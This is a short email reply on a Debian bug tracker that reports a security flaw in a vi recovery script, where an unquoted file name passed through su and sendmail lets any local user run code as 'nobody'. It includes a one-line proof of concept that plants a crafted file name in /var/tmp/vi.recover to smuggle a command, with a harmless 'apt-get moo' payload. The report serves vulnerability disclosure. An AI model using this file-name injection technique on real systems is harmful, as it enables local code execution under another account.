Control: tags -1 + security

* Adam M. Costello <bug.amc...@nicemice.net>, 2014-11-15, 20:47:
(su - nobody -s /bin/sh -c "$SENDMAIL $owner < $i" &) </dev/null >/dev/null 2>&0

Note that "$i" is a name of a file any user can create. This allows executing arbitrary code as user "nobody".

PoC exploit:

$ echo 'X-vi-recover-path: /etc/fstab' > 
'/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'

--
Jakub Wilk

Reply via email to